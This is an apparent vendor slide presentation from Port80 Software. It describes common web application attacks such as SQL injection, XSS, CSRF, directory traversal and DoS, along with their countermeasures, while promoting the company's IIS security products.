Why You Need A Web Application Firewall

Why you need a Web App Firewalland more

A Review of Web Application Attacks & Countermeasures

A Review of Web Application Attacks and Countermeasures

Why you need a Web App Firewall (and more)

While the details of these attacks vary greatly, the key threat concepts -- and the main defensive countermeasures -- are well-understood and can be boiled down to a manageable list.

Let's take a look at the major attack types that your Microsoft IIS Web servers, database-enabled Web sites and Web-based applications need to be ready for. We will also point you to the Port80 Software solutions that provide effective counter-measures to these types of attacks.

There are so many types of Web-based attacks and security risks to watch out for, where do you start?

Network and System Reconnaissance


Camouflage should be "standard issue" for Web servers.

The first task of a Web attacker (a cyber criminal, internal or external) is to determine your operating system, Web server, application server and database platforms.

Network and System Reconnaissance, cont.


The most successful attacks are often targeted attacks, so removing or obfuscating the signatures of your technology platforms

-- both obvious ones like the server name header or file extensions in HTTP, or the TCP/IP window size, as well as more subtle signatures, like cookie names, ETag formats, HTTP header order, or services running on IP/port combinations --

is an important type of countermeasure in itself.

Network and System Reconnaissance, cont.


This can either dissuade intruders from attacking your Web site or Web application altogether or force them to make incorrect assumptions that lead them to try the wrong types of attacks (for instance, a Linux/UNIX hack on a Windows system).

In turn, this makes it easier for firewalls and IDS systems to better identify and block those attacks directly.

Port80 Solutions: ServerMask

http://www.port80software.com/products/servermask/

Image and File Leeching


Do not serve Web content for others unknowingly.

A lower-priority attack that costs many sites precious bandwidth and responsiveness is a leeching attack, where a hacker identifies file resources that are not access controlled or protected by authentication on your Web site, like images and video.

Image and File Leeching, cont.


They link to the file resource in your site from within their Web page, so that their Web users access your content directly (which you served and paid the bandwidth for).

Unaware Web users will not know that it is actually your content that they are viewing.

The solution is to make sure that Web requests for file resources on a site or application are indeed from a Web user that is on your site, not another site that has deep linked to your file resources.

Image and File Leeching, cont.


The countermeasures to stop this type of leeching attack range from the simple and to the more robust, from referer checking through time-limited or "sessionized" URLs.

You can also weed out the more amateurish types of leeching bots and scripts by checking the cookie, browser, and HTTP header details for each request.

Port80 Solutions: LinkDeny

http://www.port80software.com/products/linkdeny/

Restricting Access


Block IPs that are no good (up to no good or not good for you).

You can also protect against undesired use of your Web content by using IP access control to that content. This is often overlooked in sites that use authentication and authorization, but what if you need to host content for anonymous users as well -- or exclusively?

Restricting Access, cont.


You may still be able to limit your audience, and hence your vulnerability to malicious requests.

If for instance your site or application is designed for users in a handful of specific countries, why let users from other countries (including perhaps those known for a disproportionate share of phishing and fraud) access the Web content and endlessly probe how it is served, costing you bandwidth in the meantime?

And if unwanted traffic persists from a particular Web site or IP range, why continue to treat that traffic as if it were legitimate?

Restricting Access, cont.


Controlling access to Web content is by no means the same as locking down your Web server, site and application against determined exploits, but it can be a prudent deterrent to further abuse.

Port80 Solutions: LinkDeny


SQL Injection Attacks


If it is going in the database, clean it up first.

SQL injection attacks attempt to use application code to access or corrupt database content.

This is accomplished via a Web request where the Web user input is incorrectly filtered for string literal escape characters that can be embedded in your SQL statements (like " or *) or more generally not strongly typed or sanitized, and thereby unexpectedly interpreted and executed as SQL.

SQL Injection Attacks, cont.


You can code to avoid this type of attack in your Web application, but many Web developers do not have the time or the expertise to cover the types of input sanitization required to make sure that:

1. characters passed in URL strings do not allow for unintended database access and control and

2. the type of data being passed in the URL is what was intended (for example, checking that user supplied input characters expected in a numeric field to be used in a SQL statement are indeed numeric).

SQL Injection Attacks, cont.


You can also work to make the database more secure with such measures as stored procedures and least-access security privileges for accounts accessing the database.

Still, you need to sanitize the inputs allowed to access the database to avoid such parser evasion attacks that try to sneak various characters in a string, allowing an attacker to add on commands to a normal variable value to delete or alter database content (or escalate their privileges on your application or server itself).

Port80 Solutions: ServerDefender AI, ServerDefender VP

Buffer Overflow Attacks


Put some limits on data requested from unknown Web users.

Attackers love to throw huge amounts of malicious data at systems to see what limits have been set and to see if too much data crammed in a particular form field or URL string will crash the system -- or lead to remote control of your servers.

Buffer Overflow Attacks, cont.


They will pack high-bit shellcode (a transferable piece of code used as the payload in the exploitation of a software bug) into a Web request, hoping that the developer has not placed any buffer limits on the request and is not sanitizing input into the Web application.

Placing a limit on buffer characters easily helps to avoid this type of attack.


Cross-Site Scripting (XSS) Attacks


Don't become a vector for attacks on other sites or your Web visitors themselves.

Often used in conjunction with phishing, social engineering, and other browser exploits, XSS attacks inject malicious HTML or client-side scripts into Web pages viewed by other users, thereby bypassing access controls that browsers use to make sure requests are from the same domain (same origin policy).

Cross-Site Scripting (XSS) Attacks, cont.


By these means, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other client-side objects through a XSS attacks.

Some XSS attacks can be tracked to DOM-based or local cross-site script vulnerabilities within a page's client-side script itself, often called non-persistent or reflected XSS vulnerabilities.

When data provided by a Web user is used immediately by server-side scripts to generate a page of results for that user, and if unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page.



If an attacker could convince a user to follow a malicious URL which injects code into the results page, the attacker gets full access to that page's content, where many other traps can be laid for the user like:

• false search engine or• database search results displaying

hacker-designed and -controlled URLs



Don't become a vector for attacks on other sites or your Web

visitors themselves.

Often used in conjunction with phishing, social engineering, and other browser exploits,

XSS attacks inject malicious HTML or client-side scripts into Web pages viewed by other users, thereby bypassing access

controls that browsers use to make sure requests are from the same domain

(same origin policy).

By these means, an attacker can gain elevated access privileges to:

• sensitive page content,• session cookies,• and a variety of other client-side objects through a XSS attacks.



Some XSS attacks can be tracked to DOM-based or local cross-site script vulnerabilities within a page's client-side script itself, often called non-persistent or reflected XSS vulnerabilities.

When data provided by a Web user is used immediately by server-side scripts to generate a page of results for that user, and if unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page.



If an attacker could convince a user to follow a malicious URL which injects code into the results page, the attacker gets full access to that page's content, where many other traps can be laid for the user:

• like false search engine or • database search results displaying hacker-designed

and -controlled URLs).


http://www.port80software.com/products/serverdefenderai/artificialintelligence.asp


Cross-Site Request Forgery Attacks


Seriously, don't become a vector for indirect attacks on other sites or your visitors.

Cross-site request forgery (CSRF or XSRF), also known as a one click attack or session riding, is an exploit very similar to an XXS attack.

Rather than an attacker injecting unauthorized code into a Web site, a cross-site request forgery attack only transmits unauthorized commands from a user that the Web site or application considers to be authenticated.

Cross-Site Request Forgery Attacks, cont.


At risk are Web sites and applications that perform actions based on input from trusted and authenticated users without requiring the user to authorize the specific action.

These attacks are characteristic vulnerabilities of Ajax-based applications that make use of the XMLHttpRequest (XHR) API.

A user that is authenticated by a cookie saved in his Web browser could unknowingly send an HTTP request to a site that trusts him and thereby cause an unwanted action (for instance, withdrawing funds from a bank account).



These types of attacks are very common on Internet forums, where users are allowed to post images but not JavaScript.

To combat this, URLs can be sessionized by implementing a transient authentication mechanism (such as a constantly-changing, hidden form field value) in place of persistent, cookie-based, or HTTP authentication.

A simpler approach, requiring far less code rewriting, is to check that the referer in the request is from an authorized, on-site page. This can be spoofed, however, and so should not be relied upon exclusively.



For Ajax scenarios in particular, a modestly costly method for combating CSRF attacks is to require the double submission of any cookies that are used for authentication -- essentially by reading the authentication token from the cookie on the client side using JavaScript, submitting it separately with the GET or POST, and then validating it along with the cookie itself.

Cookie encryption or signing also helps to defeat these attacks.

Port80 Solutions: ServerDefender AI, ServerDefender VP, LinkDeny (weak protection)



http://www.port80software.com/products/serverdefenderai/vulnerabilityprotection.asp




Directory Traversal Attacks


/admin, /scripts, /noaccess, /etc.

If you can get to a file via a URL, an attacker can get to it as well, even if the link is not publicly displayed on your Web site.

Also known as ../ (dot dot slash), directory climbing, backtracking, and sometimes a canonicalization attack, a directory traversal attack exploits insufficient security validation and sanitization of user-supplied URL paths in Web site and application requests.

Directory Traversal Attacks, cont.


This type of attack does not mean a coding deficiency, but rather a lack of security and authentication for all Web resources on a site or application.

Microsoft Windows or DOS directory traversal uses the ..\ characters, although many Windows programs or APIs also accept UNIX-like directory traversal characters (../), but at least most directory vulnerabilities on Windows are limited to a single partition (C://, etc.).

Directory Traversal Attacks, cont.


Though IIS can handle simple cases of directory traversal attacks, this is just a start.

You need to stop requests to seemingly non-existent Web resources, sanitize inputs from all odd or non-standard character encodings, ensure document roots are known and string lengths are consistent, and also confirm that no files outside the document root of the site can be served.

Of course, the best response to a directory traversal request (the only one that does not give any clues to the attacker) is a good old 404 HTTP response.

Port80 Solutions: ServerDefender AI, ServerDefender VP.





Zero Day Attacks


Protect against attacks before the patch and after the patch.

A zero-day (or zero-hour) attack is not so much a specific type of attack as it is a special case of all other types. A zero-day attack is one that exposes heretofore undisclosed or unpatched computer application vulnerabilities.

Zero Day Attacks, cont.


Zero-day attacks take advantage of Web security holes for which no solution is currently available.

0-day exploits are released before or on the same day that the vulnerability is discovered or announced, sometimes even on the day that the vendor patch is released to the public.

The term derives from the number of days between the public advisory and the release of the exploit. The name itself is an indication of the vendor patch being available, i.e. the vulnerability affected unpatched systems for zero days.

Zero Day Attacks, cont.


As new attacks are introduced to IIS and application server code that often fall in the category of some of the other attacks discussed here, it is vital to have a general purpose Web application firewall covering the bases to protect the site or app from that attack vector before the platform patches can be applied.






Brute Force Attacks


A, B, C, D, Admin Access...

A brute force attack, sometimes called a dictionary attack, is a method of defeating a cryptographic authentication/authorization scheme by trying a large number of possible answers.

The best example is exhaustively working through all possible keys in order to discover a password combination.

Brute Force Attacks, cont.


Like a zero day attack, brute force attacks are often used to find open, unprotected directories or to break authentication and authorization layers.

Effective request throttling, tracking and limiting the frequency of Web requests per second to a particular login file or directory, often defeats this form of automated attack.

Port80 Solutions: ServerDefender AI



Denial-of-Service Attack


Too much traffic can be deadly for any Web site.

A denial-of-service attack (DoS) is an attempt to make a Web server resource unavailable to its intended users.

Although there are many ways to accomplish such an attack, it generally comprises the concerted, malevolent efforts of hackers to prevent an Internet site or application from functioning efficiently or at all, temporarily or indefinitely, by flooding the site or app with an unusually high amount of Web requests, including requests that tie up resources by inducing error states.

Denial-of-Service Attack, cont.


This, in turn, forces the targeted Web server to reset or consume its resources such that it can no longer serve legitimate requests.

Like a brute force attack, being able to identify and block IP addresses with a high frequency of requests can stop these attacks before site resources are used up, keeping legitimate Web users in service.

Privilege Escalation Attacks


Control is the ultimate goal of all attackers.

At the end of the day, almost every Web attack is an attempt to escalate privileges and gain remote control over your Web sites, apps, data and user communities. Privilege escalation is the act of exploiting a bug in an application to gain access to resources which normally would have been protected from an application or user with lower privileges.

Privilege Escalation Attacks, cont.


The result is that the Web application performs actions with a higher security context that were intended for Web developers or system administrators.

Buffer overflows, XSS, and CSRF are all examples of such privilege escalation attacks. Most hacks focus on getting admin privileges on the target Web site and can involve unauthorized access leading to printer protocol and remote data services attacks, even access to run the command line with administrator or the application's privileges itself.

At that point, your Web server is now the attacker's Web server, and they will quickly look to attack the rest of your network from that beachhead.






Defense-in-Depth Works


How do you avoid being fully hacked?

In general, it goes without saying that you should protect your ports and network with a standard hardware firewall, keep patching your OS, Web, app, and DB layers, authenticate secure sections of the site, and learn as much as possible about the security options in your code development on ASP, ASP.NET, ColdFusion, PHP, JSP, or other type of Web-based application.

Defense-in-Depth Works, cont.


By additionally layering in Port80 Software's security solutions, you will augment these systems to directly protect your Microsoft IIS Web server, Web apps, and data from the bad guys out there on the Internet.

About Port80 Software

Web Server Technologies | Part I: HTTP & Getting Started

Solutions for Microsoft IIS Web Servers

Port80 software exposes control to server-side functionality for developers, and streamlines tasks for administrators:

• Increase security by locking down what info you broadcast and blocking intruders with ServerMask and ServerDefender

• Protect your intellectual property by preventing hotlinking with LinkDeny

• Improve performance: compress pages and manage cache controls for faster load time and bandwidth savings with CacheRight, httpZip, and ZipEnable

• Upgrade Web development tools: Negotiate content based on device, language, or other parameters with PageXchanger, and tighten code with w3compiler.

Visit us online @ www.port80software.com

Technology

Why You Need A Web Application Firewall